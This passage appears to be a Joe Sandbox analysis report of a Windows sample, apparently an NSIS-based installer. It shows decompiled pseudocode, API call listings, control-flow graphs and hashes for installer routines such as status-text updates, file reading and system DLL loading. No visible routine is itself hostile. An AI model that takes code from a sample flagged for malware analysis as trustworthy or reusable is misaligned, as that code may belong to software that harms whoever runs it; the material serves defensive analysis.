                                                                                        0x004018be
                                                                                        0x004018ca
                                                                                        0x004018b8
                                                                                        0x004018b8
                                                                                        0x004018bc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004018bc
                                                                                        0x004018d3
                                                                                        0x004018d9
                                                                                        0x004018db
                                                                                        0x00000000
                                                                                        0x004018e1
                                                                                        0x004018e1
                                                                                        0x004018e4
                                                                                        0x004018fc
                                                                                        0x004018e6
                                                                                        0x004018e9
                                                                                        0x004018f2
                                                                                        0x004018f2
                                                                                        0x00401901
                                                                                        0x00401906
                                                                                        0x00402398
                                                                                        0x00000000
                                                                                        0x00402398
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                          • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00403418), ref: 004055FA
                                                                                          • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll), ref: 0040560C
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsiF917.tmp$C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll$Call
                                                                                        • API String ID: 1941528284-1394736739
                                                                                        • Opcode ID: 1f818d2d0e80a878676138eafe39d229bc6d091a70e5c7c4d44bb1fa455db58e
                                                                                        • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                        • Opcode Fuzzy Hash: 1f818d2d0e80a878676138eafe39d229bc6d091a70e5c7c4d44bb1fa455db58e
                                                                                        • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040559F(signed int _a4, WCHAR* _a8) {
                                                                                        				struct HWND__* _v8;
                                                                                        				signed int _v12;
                                                                                        				WCHAR* _v32;
                                                                                        				long _v44;
                                                                                        				int _v48;
                                                                                        				void* _v52;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				WCHAR* _t27;
                                                                                        				signed int _t28;
                                                                                        				long _t29;
                                                                                        				signed int _t37;
                                                                                        				signed int _t38;
                                                                                        
                                                                                        				_t27 =  *0x433ee4; // 0x10438
                                                                                        				_v8 = _t27;
                                                                                        				if(_t27 != 0) {
                                                                                        					_t37 =  *0x434fb4;
                                                                                        					_v12 = _t37;
                                                                                        					_t38 = _t37 & 0x00000001;
                                                                                        					if(_t38 == 0) {
                                                                                        						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                                                        					}
                                                                                        					_t27 = lstrlenW(0x42c248);
                                                                                        					_a4 = _t27;
                                                                                        					if(_a8 == 0) {
                                                                                        						L6:
                                                                                        						if((_v12 & 0x00000004) == 0) {
                                                                                        							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                                                        						}
                                                                                        						if((_v12 & 0x00000002) == 0) {
                                                                                        							_v32 = 0x42c248;
                                                                                        							_v52 = 1;
                                                                                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                        							_v44 = 0;
                                                                                        							_v48 = _t29 - _t38;
                                                                                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                        						}
                                                                                        						if(_t38 != 0) {
                                                                                        							_t28 = _a4;
                                                                                        							0x42c248[_t28] = 0;
                                                                                        							return _t28;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t27 = lstrlenW(_a8) + _a4;
                                                                                        						if(_t27 < 0x1000) {
                                                                                        							_t27 = lstrcatW(0x42c248, _a8);
                                                                                        							goto L6;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				return _t27;
                                                                                        			}

















                                                                                        0x004055a5
                                                                                        0x004055af
                                                                                        0x004055b4
                                                                                        0x004055ba
                                                                                        0x004055c5
                                                                                        0x004055c8
                                                                                        0x004055cb
                                                                                        0x004055d1
                                                                                        0x004055d1
                                                                                        0x004055d7
                                                                                        0x004055df
                                                                                        0x004055e2
                                                                                        0x004055ff
                                                                                        0x00405603
                                                                                        0x0040560c
                                                                                        0x0040560c
                                                                                        0x00405616
                                                                                        0x0040561f
                                                                                        0x0040562b
                                                                                        0x00405632
                                                                                        0x00405636
                                                                                        0x00405639
                                                                                        0x0040564c
                                                                                        0x0040565a
                                                                                        0x0040565a
                                                                                        0x0040565e
                                                                                        0x00405660
                                                                                        0x00405663
                                                                                        0x00000000
                                                                                        0x00405663
                                                                                        0x004055e4
                                                                                        0x004055ec
                                                                                        0x004055f4
                                                                                        0x004055fa
                                                                                        0x00000000
                                                                                        0x004055fa
                                                                                        0x004055f4
                                                                                        0x004055e2
                                                                                        0x0040566f

                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                        • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00425A20,774723A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00403418), ref: 004055FA
                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll), ref: 0040560C
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                          • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                          • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000), ref: 00406779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll
                                                                                        • API String ID: 1495540970-149352312
                                                                                        • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                        • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                        • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                        • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 649 4026ec-402705 call 402d84 652 402c2a-402c2d 649->652 653 40270b-402712 649->653 656 402c33-402c39 652->656 654 402714 653->654 655 402717-40271a 653->655 654->655 657 402720-40272f call 40649d 655->657 658 40287e-402886 655->658 657->658 662 402735 657->662 658->652 663 40273b-40273f 662->663 664 4027d4-4027d7 663->664 665 402745-402760 ReadFile 663->665 667 4027d9-4027dc 664->667 668 4027ef-4027ff call 4060b0 664->668 665->658 666 402766-40276b 665->666 666->658 669 402771-40277f 666->669 667->668 670 4027de-4027e9 call 40610e 667->670 668->658 676 402801 668->676 673 402785-402797 MultiByteToWideChar 669->673 674 40283a-402846 call 406484 669->674 670->658 670->668 673->676 677 402799-40279c 673->677 674->656 680 402804-402807 676->680 681 40279e-4027a9 677->681 680->674 683 402809-40280e 680->683 681->680 684 4027ab-4027d0 SetFilePointer MultiByteToWideChar 681->684 685 402810-402815 683->685 686 40284b-40284f 683->686 684->681 687 4027d2 684->687 685->686 688 402817-40282a 685->688 689 402851-402855 686->689 690 40286c-402878 SetFilePointer 686->690 687->676 688->658 691 40282c-402832 688->691 692 402857-40285b 689->692 693 40285d-40286a 689->693 690->658 691->663 694 402838 691->694 692->690 692->693 693->658 694->658
                                                                                        C-Code - Quality: 87%
                                                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                        				intOrPtr _t65;
                                                                                        				intOrPtr _t66;
                                                                                        				intOrPtr _t72;
                                                                                        				void* _t76;
                                                                                        				void* _t79;
                                                                                        
                                                                                        				_t72 = __edx;
                                                                                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                        				_t65 = 2;
                                                                                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                        				_t66 = E00402D84(_t65);
                                                                                        				_t79 = _t66 - 1;
                                                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                        				if(_t79 < 0) {
                                                                                        					L36:
                                                                                        					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                                        				} else {
                                                                                        					__ecx = 0x3ff;
                                                                                        					if(__eax > 0x3ff) {
                                                                                        						 *(__ebp - 0x44) = 0x3ff;
                                                                                        					}
                                                                                        					if( *__edi == __bx) {
                                                                                        						L34:
                                                                                        						__ecx =  *(__ebp - 0xc);
                                                                                        						__eax =  *(__ebp - 8);
                                                                                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                        						if(_t79 == 0) {
                                                                                        							 *(_t76 - 4) = 1;
                                                                                        						}
                                                                                        						goto L36;
                                                                                        					} else {
                                                                                        						 *(__ebp - 0x38) = __ebx;
                                                                                        						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                                        						if( *(__ebp - 0x44) > __ebx) {
                                                                                        							do {
                                                                                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                        										__eax = __ebp - 0x50;
                                                                                        										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                        											goto L34;
                                                                                        										} else {
                                                                                        											goto L21;
                                                                                        										}
                                                                                        									} else {
                                                                                        										goto L34;
                                                                                        									}
                                                                                        								} else {
                                                                                        									__eax = __ebp - 0x40;
                                                                                        									_push(__ebx);
                                                                                        									_push(__ebp - 0x40);
                                                                                        									__eax = 2;
                                                                                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                                                        									if(__eax == 0) {
                                                                                        										goto L34;
                                                                                        									} else {
                                                                                        										__ecx =  *(__ebp - 0x40);
                                                                                        										if(__ecx == __ebx) {
                                                                                        											goto L34;
                                                                                        										} else {
                                                                                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                        											 *(__ebp - 0x4c) = __ecx;
                                                                                        											 *(__ebp - 0x50) = __eax;
                                                                                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                        												L28:
                                                                                        												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                        											} else {
                                                                                        												__ebp - 0x50 = __ebp + 0xa;
                                                                                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                        													L21:
                                                                                        													__eax =  *(__ebp - 0x50);
                                                                                        												} else {
                                                                                        													__edi =  *(__ebp - 0x4c);
                                                                                        													__edi =  ~( *(__ebp - 0x4c));
                                                                                        													while(1) {
                                                                                        														_t22 = __ebp - 0x40;
                                                                                        														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                        														__eax = 0xfffd;
                                                                                        														 *(__ebp - 0x50) = 0xfffd;
                                                                                        														if( *_t22 == 0) {
                                                                                        															goto L22;
                                                                                        														}
                                                                                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                        														__edi = __edi + 1;
                                                                                        														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                                                        														__ebp - 0x50 = __ebp + 0xa;
                                                                                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															goto L21;
                                                                                        														}
                                                                                        														goto L22;
                                                                                        													}
                                                                                        												}
                                                                                        												L22:
                                                                                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                        													goto L28;
                                                                                        												} else {
                                                                                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                        														} else {
                                                                                        															__ecx =  *(__ebp - 0xc);
                                                                                        															__edx =  *(__ebp - 8);
                                                                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                        														}
                                                                                        														goto L34;
                                                                                        													} else {
                                                                                        														__ecx =  *(__ebp - 0xc);
                                                                                        														__edx =  *(__ebp - 8);
                                                                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                        														 *(__ebp - 0x38) = __eax;
                                                                                        														if(__ax == __bx) {
                                                                                        															goto L34;
                                                                                        														} else {
                                                                                        															goto L26;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								goto L37;
                                                                                        								L26:
                                                                                        								__eax =  *(__ebp - 8);
                                                                                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                        						}
                                                                                        						goto L34;
                                                                                        					}
                                                                                        				}
                                                                                        				L37:
                                                                                        				return 0;
                                                                                        			}








                                                                                        0x004026ec
                                                                                        0x004026ee
                                                                                        0x004026f1
                                                                                        0x004026f3
                                                                                        0x004026f6
                                                                                        0x004026fb
                                                                                        0x004026ff
                                                                                        0x00402702
                                                                                        0x00402705
                                                                                        0x00402c2a
                                                                                        0x00402c2d
                                                                                        0x0040270b
                                                                                        0x0040270b
                                                                                        0x00402712
                                                                                        0x00402714
                                                                                        0x00402714
                                                                                        0x0040271a
                                                                                        0x0040287e
                                                                                        0x0040287e
                                                                                        0x00402881
                                                                                        0x00402886
                                                                                        0x004015b6
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00000000
                                                                                        0x00402720
                                                                                        0x00402721
                                                                                        0x0040272c
                                                                                        0x0040272f
                                                                                        0x0040273b
                                                                                        0x0040273f
                                                                                        0x004027d7
                                                                                        0x004027ef
                                                                                        0x004027ff
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402745
                                                                                        0x00402745
                                                                                        0x00402748
                                                                                        0x00402749
                                                                                        0x0040274c
                                                                                        0x00402751
                                                                                        0x00402758
                                                                                        0x00402760
                                                                                        0x00000000
                                                                                        0x00402766
                                                                                        0x00402766
                                                                                        0x0040276b
                                                                                        0x00000000
                                                                                        0x00402771
                                                                                        0x00402771
                                                                                        0x00402779
                                                                                        0x0040277c
                                                                                        0x0040277f
                                                                                        0x0040283a
                                                                                        0x00402841
                                                                                        0x00402785
                                                                                        0x0040278b
                                                                                        0x00402797
                                                                                        0x00402801
                                                                                        0x00402801
                                                                                        0x00402799
                                                                                        0x00402799
                                                                                        0x0040279c
                                                                                        0x0040279e
                                                                                        0x0040279e
                                                                                        0x0040279e
                                                                                        0x004027a1
                                                                                        0x004027a6
                                                                                        0x004027a9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004027ab
                                                                                        0x004027ae
                                                                                        0x004027b6
                                                                                        0x004027c2
                                                                                        0x004027d0
                                                                                        0x00000000
                                                                                        0x004027d2
                                                                                        0x00000000
                                                                                        0x004027d2
                                                                                        0x00000000
                                                                                        0x004027d0
                                                                                        0x0040279e
                                                                                        0x00402804
                                                                                        0x00402807
                                                                                        0x00000000
                                                                                        0x00402809
                                                                                        0x0040280e
                                                                                        0x0040284f
                                                                                        0x00402871
                                                                                        0x00402878
                                                                                        0x0040285d
                                                                                        0x0040285d
                                                                                        0x00402860
                                                                                        0x00402863
                                                                                        0x00402866
                                                                                        0x00402866
                                                                                        0x00000000
                                                                                        0x00402817
                                                                                        0x00402817
                                                                                        0x0040281a
                                                                                        0x0040281d
                                                                                        0x00402823
                                                                                        0x00402827
                                                                                        0x0040282a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040282a
                                                                                        0x0040280e
                                                                                        0x00402807
                                                                                        0x0040277f
                                                                                        0x0040276b
                                                                                        0x00402760
                                                                                        0x00000000
                                                                                        0x0040282c
                                                                                        0x0040282c
                                                                                        0x0040282f
                                                                                        0x00402838
                                                                                        0x00000000
                                                                                        0x0040272f
                                                                                        0x0040271a
                                                                                        0x00402c33
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                          • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                        • String ID: 9
                                                                                        • API String ID: 163830602-2366072709
                                                                                        • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                        • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                        • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                        • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 695 40689a-4068ba GetSystemDirectoryW 696 4068bc 695->696 697 4068be-4068c0 695->697 696->697 698 4068d1-4068d3 697->698 699 4068c2-4068cb 697->699 700 4068d4-406907 wsprintfW LoadLibraryExW 698->700 699->698 701 4068cd-4068cf 699->701 701->700
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040689A(intOrPtr _a4) {
                                                                                        				short _v576;
                                                                                        				signed int _t13;
                                                                                        				struct HINSTANCE__* _t17;
                                                                                        				signed int _t19;
                                                                                        				void* _t24;
                                                                                        
                                                                                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                        				if(_t13 > 0x104) {
                                                                                        					_t13 = 0;
                                                                                        				}
                                                                                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                        					_t19 = 1;
                                                                                        				} else {
                                                                                        					_t19 = 0;
                                                                                        				}
                                                                                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                        				return _t17;
                                                                                        			}








                                                                                        0x004068b1
                                                                                        0x004068ba
                                                                                        0x004068bc
                                                                                        0x004068bc
                                                                                        0x004068c0
                                                                                        0x004068d3
                                                                                        0x004068cd
                                                                                        0x004068cd
                                                                                        0x004068cd
                                                                                        0x004068ec
                                                                                        0x00406900
                                                                                        0x00406907

                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                        • wsprintfW.USER32 ref: 004068EC
                                                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-1946221925
                                                                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                        • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                        • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 702 405a6e-405ab9 CreateDirectoryW 703 405abb-405abd 702->703 704 405abf-405acc GetLastError 702->704 705 405ae6-405ae8 703->705 704->705 706 405ace-405ae2 SetFileSecurityW 704->706 706->703 707 405ae4 GetLastError 706->707 707->705
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405A6E(WCHAR* _a4) {
                                                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                                                        				int _t22;
                                                                                        				long _t23;
                                                                                        
                                                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                        				_v36.Owner = 0x4083f8;
                                                                                        				_v36.Group = 0x4083f8;
                                                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
